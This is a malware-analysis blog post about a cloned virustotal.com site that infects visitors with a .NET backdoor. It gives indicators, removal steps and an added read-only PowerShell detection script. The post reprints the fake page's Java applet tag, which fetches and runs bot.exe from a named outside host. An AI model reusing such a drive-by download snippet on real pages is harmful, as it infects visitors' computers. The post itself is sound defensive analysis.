Fake virustotal.com website leading to malware

With over 200,000 submissions per day, http://www.virustotal.com is the greatest online scanner for malware and dubious URLs. It combines all the major antivirus engines in a very fast and free service, which gives a much more accurate idea of whether a submitted file is malware than any single antivirus can, and so it has a huge number of visitors (submitters).

Malicious persons recently exploited this popularity in an attempt to spread malware. They created a fake virustotal.com website, a so-called "clone". Clones, fake copies of well-known websites, are used intensively by hackers to trick visitors into entering their credentials for the real website, or even their credit card details, into the fields of the fake one. In this way all this important data is stolen.

In our example, the intent of the fake virustotal page was to infect visitors with malware of the backdoor/trojan type. NOD32 antivirus reports it as a variant of MSIL/Restamdos.AD, and Microsoft antivirus as Backdoor:MSIL/Pontoeb.B. Here is the virustotal.com report for this malware. It's a "semi-compiled" malware program; it needs the .NET Framework in order to run.

The fake virustotal website, http://new-virustotal.tk, runs the fake web page in a frame hosted at http://readman.pf-control.de/java/. The fake page also has a Java applet which automatically downloads and executes the above-mentioned malware on the visitor's computer.

The Java applet is a simple one, see its source:

<applet code="Main.class" archive="signedapplet.jar" width="30" height="20">
<param name="fileName" value="bot.exe">
<param name="url" value="http://readman.pf-control.de/java/">
</applet>

and here is the fake virustotal.com website home page:

[Image: fake virustotal website]

The malware that the fake virustotal.com website is spreading is 104,960 bytes in size and has the MD5 hash 40E2C636E5864CD521B5366342E20AA1.

It's good to know how to remove this malware from your computer. The malware autostarts at every reboot by adding two registry entries under the keys:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

Look at these registry keys using the registry editor for any suspicious value. It is also known that the malware creates a sub-folder named recyclerr in the %appdata% folder, containing a file, recyclerr.exe, which is the actual virus body. You must stop the malware process using Task Manager and delete the malware file mentioned above.
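The checks described above can be scripted. The following PowerShell is an added example, not part of the original post; it only reports, and it uses the two Run keys, the recyclerr folder and file name, the size and the MD5 hash given in this post. Matching on the string "recyclerr" in the Run values is an assumption based on the file name.

```powershell
# Added example, not from the original post. Read-only: it reports, it does not delete.
$expectedMd5  = '40E2C636E5864CD521B5366342E20AA1'  # MD5 given in the post
$expectedSize = 104960                                # size in bytes given in the post
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)

# 1. Autostart entries: list Run values whose command line mentions "recyclerr".
foreach ($key in $runKeys) {
    if (-not (Test-Path -Path $key)) { continue }
    $regKey = Get-Item -Path $key
    foreach ($name in $regKey.GetValueNames()) {
        $data = [string]$regKey.GetValue($name)
        if ($data -match 'recyclerr') {
            Write-Output "Suspicious Run value: $key -> $name = $data"
        }
    }
}

# 2. Dropped file: %appdata%\recyclerr\recyclerr.exe, compared with the post's size and MD5.
$path = Join-Path -Path $env:APPDATA -ChildPath 'recyclerr\recyclerr.exe'
if (Test-Path -LiteralPath $path) {
    $file = Get-Item -LiteralPath $path -Force   # -Force: the file may be hidden
    $md5  = (Get-FileHash -LiteralPath $path -Algorithm MD5).Hash
    Write-Output "Found $path ($($file.Length) bytes, MD5 $md5)"
    if ($md5 -eq $expectedMd5 -and $file.Length -eq $expectedSize) {
        Write-Output 'Size and MD5 match the sample described in the post.'
    } else {
        # Assumption: other builds of the same family can differ in size and hash.
        Write-Output 'Size or MD5 differs from the post; treat the file as suspicious anyway.'
    }
} else {
    Write-Output "Not found: $path"
}

# 3. Running process named after the dropped file.
Get-Process -Name 'recyclerr' -ErrorAction SilentlyContinue |
    Select-Object -Property Id, ProcessName, Path
```

Run it as the affected user, because %appdata% and the HKEY_CURRENT_USER key are per-user.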

As a general security rule, make a habit of verifying links before you click them by hovering the mouse over them for a second or two, and try to avoid links that look like they lead to a fake website; very often fake websites differ from the legitimate ones by only a letter or two, so the names are similar but not the same.

Keep safe!
